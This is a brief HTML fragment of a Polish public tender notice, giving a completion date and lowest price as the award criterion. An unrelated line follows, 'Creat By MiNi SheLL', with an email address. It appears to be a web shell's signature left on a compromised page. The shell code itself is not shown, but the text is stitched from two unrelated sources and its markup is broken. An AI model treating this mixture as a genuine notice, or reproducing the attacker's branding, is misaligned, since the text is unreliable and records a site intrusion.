<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com